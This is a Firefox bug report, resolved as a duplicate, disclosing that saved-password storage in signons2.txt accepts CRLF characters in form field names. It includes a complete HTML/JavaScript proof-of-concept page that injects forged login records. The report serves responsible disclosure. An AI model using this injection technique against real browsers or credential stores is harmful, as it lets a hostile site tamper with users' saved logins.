400600 - Injecting login/password information

Status: RESOLVED DUPLICATE of bug 394610

(Toolkit :: Password Manager, defect)

Description

[Dariusz Tytko]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8

1.Overview.

FF stores saved login/password information in 'signons2.txt' file in the following format:

#2d
reject domain 1
reject domain 2
...
reject domain n
.
domain
user_field
user_value
pass_field
pass_value
action_domain
.
etc...

user_field and pass_fied are names of login and password input tags. These values are puts to the file without any filtering so it's possible to manipulate contents of that file by injecting new line chars ('\r\n' – tested on Windows XP SP2). I know it isn't critical issue but it's curious feature :).

2.Proof of Concept

Below is the POF code, it injects login/password information, script works ONLY remotely, for testing make the following steps:

* fill in injecting record values (host, input tag names, login and password)
* click 'Inject Record'
* fill in login/password fields
* click 'Log in'
* answer 'yes' for question about saving login/password information
* reset FF

After that you should see two new records in the password manager one of them is unexpected :)

--- CUT-----
<html>
<head>
<title>FF Password Injector</title>
<script>

// Base64 code from Tyler Akins -- http://rumkin.com
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

function encode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;

   do {
      chr1 = input.charCodeAt(i++);
      chr2 = input.charCodeAt(i++);
      chr3 = input.charCodeAt(i++);

      enc1 = chr1 >> 2;
      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
      enc4 = chr3 & 63;

      if (isNaN(chr2)) {
         enc3 = enc4 = 64;
      } else if (isNaN(chr3)) {
         enc4 = 64;
      }

      output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + 
         keyStr.charAt(enc3) + keyStr.charAt(enc4);
   } while (i < input.length);
   
   return output;
}

function changeInputName() {
        $injectHost = document.form1.host.value;
        $injectUserName = document.form1.user_name.value;
        $injectPassName = document.form1.login_name.value;
        
        $injectUserValue = encode64(document.form1.user_value.value);
        $injectPassValue = encode64(document.form1.login_value.value);

        $selfHost = location.protocol + "//" + location.hostname;

        $name =
                "\r\n" +
                "\r\n" +
                "\r\n" +
                "\r\n" +
                $selfHost + "\r\n" +
                ".\r\n" +

                // begin of the new record
                $injectHost + "\r\n" +
                $injectUserName + "\r\n" +
                "~" + $injectUserValue + "\r\n" +
                "*" + $injectPassName + "\r\n" +
                "~" + $injectPassValue + "\r\n" +
                $injectHost + "\r\n" +
                ".\r\n" +
                // end

                $selfHost + "\r\n" +
                "login";
        
        document.form2.login.name = $name;
}
</script>
</head>
<body>
<form name="form1">
Host:<br>
<input type="text" name="host">
<br>
User field name:<br>
<input type="text" name="user_name">
<br>
Login field name:<br>
<input type="text" name="login_name">
<br>
Login:<br>
<input type="text" name="user_value">
<br>
Password:<br>
<input type="text" name="login_value">
<br>
<input type="button" value="Inject Record" onclick="changeInputName()">
</form>
<br>
<br>
<br>
<form method="post" name="form2">
<input type="text" name="login">
<br>
<input type="password" name="pass">
<br>
<input type="submit" value="Log in">
</form>
</body>
</html>
---CUT------

Regards,
Dariusz Tytko

Reproducible: Always

Steps to Reproduce:
1.
2.
3.

Comment 1

[Jeff Walden [:Waldo]]

Thanks for reporting this; as it turns out, this bug's already under investigation in bug 394610, so I'm marking this bug as a duplicate of it.  Feel free to try breaking any patches posted there, either in a home-grown build or in builds created after patches there land.